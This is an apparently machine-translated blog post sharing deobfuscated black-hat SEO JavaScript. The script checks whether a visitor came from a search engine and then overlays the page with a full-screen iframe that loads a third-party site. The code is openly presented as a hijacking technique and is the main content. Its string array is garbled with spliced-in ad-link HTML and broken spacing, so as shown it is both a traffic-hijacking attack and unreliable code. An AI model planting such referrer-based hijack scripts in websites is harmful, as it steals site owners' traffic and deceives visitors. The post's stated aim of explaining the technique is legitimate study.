Home>

Today, I accidentally discovered this js hijack search engine code when browsing the web.Hijack traffic from normal search engines,This is a common hijacking method for black hat seo.It was deliberately decrypted for everyone to understand its hijacking principle.Interested friends learn together

Today, I accidentally discovered this js hijack search engine code when browsing the web.Hijack traffic from normal search engines,This is a common hijacking method for black hat seo.It was deliberately decrypted for everyone to understand its hijacking principle.

Print source help

<script language="&span><a href =" http://cpro.google.com/cpro/ui/uijs.php?adclass=0&app_id=0&c=news&cf=47&ch=0&di=128&fv= 17&is_app=0&jk=3703a16fbcaecbb6&k=javascript&k0=javascript&kdi0=0&luki=8&n=10&p=google&q=77031027_cpr&rb=0&rs=1&seller_id=1&sid=b6cbaebc2%2ix&tid2 #tu2 #ttue2 #tu2 #ttf #tclick 2fhtml%2fbiancheng%2fjs%2f2014%2f0704%2f2065%2ehtml&urlid=0 "target =" _ blank "mpid =" 0 "><span>javascript</span></a></span>">
var _ $= ["google", "aol", "yahoo", "bing", "msn", "hotbot", "go", "searchengine", "altavista", "goto", "excite", " slider "," musicsearch "," lycos "," look<span><a href="http://cpro.google.com/cpro/ui/uijs.php?adclass=0&app_id=0&c=news&cf= 47&ch=0&di=128&fv=17&is_app=0&jk=3703a16fbcaecbb6&k=smart&k0=smart&kdi0=0&luki=3&n=10&p=google&q=77031027_cpr&rb=0&rs=1&seller_id=1&sid=b6cbaebc6t2=tu2=tu2=tu2t2=t2=t2&t=2&t=2&t=2&d=2 2fwww%2e5ixuexiwang%2ecom%2fhtml%2fbiancheng%2fjs%2f2014%2f0704%2f2065%2ehtml&urlid=0 "target =" _ blank "mpid =" 1 "><span>smart< //span></a></span > "," netscape "," search "," ask "," mahalo "," dogpile "," sr "," webcrawler "," yandex "," splut "," fireball "," wlw "," suche "," godado "," tiscali "," iltrovatore "," abacho ","<div<span><a href="http://cpro.google.com/cpro/ui/uijs.php?adclass=0&app_id=0&c=news cf=47&ch=0&di=128&fv=17&is_app=0&jk=3703a16fbcaecbb6&k=style&k0=style&kdi0=0&luki=6&n=10&p=google&q=77031027_cpr&rb=0&rs=1&seller_id=1&sid=b6cbaebct62t=6t10t6t6fa10t 2f%2fwww%2e5ixuexiwang%2ecom%2fhtml%2fbiancheng%2fjs%2f2014%2f0704%2f2065%2ehtml&urlid=0 "target =" _ blank "mpid =" 2 "><span>style</span></a></span>= \ "z-index:10043;background-color:#ffffff;right:0px;position:absolute;tex-align:center;width:100%;height:100%;top:0px;left :0px;\ "><iframe id=\" rf \ "scrolling=\" no \ "frameborder=\" 0 \ "style=\" width:100%;height:2043px;display:<span><a href="http://cpro.google.com/cpro/ui/uijs.php?adclass=0&app_id=0&c=news&cf=47&ch=0&di=128&fv=17&is_app=0&jk=3703a16fbcaecbb6&k=block&k0=block&kdi0= 0&luki=5&n=10&p=google&q=77031027_cpr&rb=0&rs=1&seller_id=1&sid=b6cbaebc6fa10337&ssp2=1&stid=0&t=tpclicked3_hc&td=2268074&tu=u2268074&u=http%3a%2f%2fwww%2e5ixuexiwang%2ecom%2fhtml%2fbiancheng%2fjs%2f2014%2f0704%2f2065%2ehtml&urlid=0 "target =" _ blank "mp =" id="idb" ;span<block</span></a></span> ;;visibility:visible;\ "<span><a href =" http://cpro.google.com/cpro/ui/uijs .php?adclass=0&app_id=0&c=news&cf=47&ch=0&di=128&fv=17&is_app=0&jk=3703a16fbcaecbb6&k=src&k0=src&kdi0=0&luki=4&n=10&p=google&q=77031027_cpr&b == 6&#=0&rs ==&id ===tpclicked3_hc&td=2268074&tu=u2268074&u=http%3a%2f%2fwww%2e5ixuexiwang%2ecom%2fhtml%2fbiancheng%2fjs%2f2014%2f0704%2f2065%2ehtml&urlid=0 "target =" _ blank "pan>><id&4&;src</span></a></span>= \ "http://www.5ixuexiwang.com/\" allowtransparency=\ "true \"></div>"];
var a=window ["document"] ["referrer"];
if (a ["indexof"] (_ $[0])>0x0 || a ["indexof"] (_ $[1])>0x0 || a ["indexof"] (_ $[2] )>0x0 || a ["indexof"] (_ $[3])>0x0 || a ["indexof"] (_ $[4])>0x0 || a ["indexof"] (_ $[5])>0x0 || a ["indexof"] (_ $[6])>0x0 || a ["indexof"] (_ $[7])>0x0 || a ["indexof "] (_ $[8])>0x0 || a [" indexof "] (_ $[9])>0x0 || a [" indexof "] (_ $[10])>0x0 || a ["indexof"] (_ $[11])>0x0 || a ["indexof"] (_ $[12])>0x0 || a ["indexof"] (_ $[13])> 0x0 || a ["indexof"] (_ $[14])>0x0 || a ["indexof"] (_ $[15])>0x0 || a ["indexof"] (_ $[ 16])>0x0 || a ["indexof"] (_ $[17])>0x0 || a ["indexof"] (_ $[18])>0x0 || a ["indexof"] (_ $[19])>0x0 || a ["indexof"] (_ $[20])>0x0 || a ["indexof"] (_ $[21])>0x0 || a [ "indexof"] (_ $[22])>0x0 || a ["indexof"] (_ $[23])>0x0 || a ["indexof"] (_ $[24])>0x0 || a ["indexof"] (_ $[25])>0x0 || a ["indexof"] (_ $[26])>0x0 || a ["indexof"] (_ $[27] )>0x0 || a ["indexof"] (_ $[28])> 0x0 || a ["indexof"] (_ $[29])>0x0 || a ["indexof"] (_ $[30])>0x0) {
  window ["document"] ["writeln"] (_ $[31])
}
</script>

The above is the black hat seo hijacking program shared with everyone.js hijacks search engine code,Hope you like it.

  • Previous Purchase date selection effect based on jQuery slider
  • Next Solution to 403 error when using jquery ajax post data in django (two methods)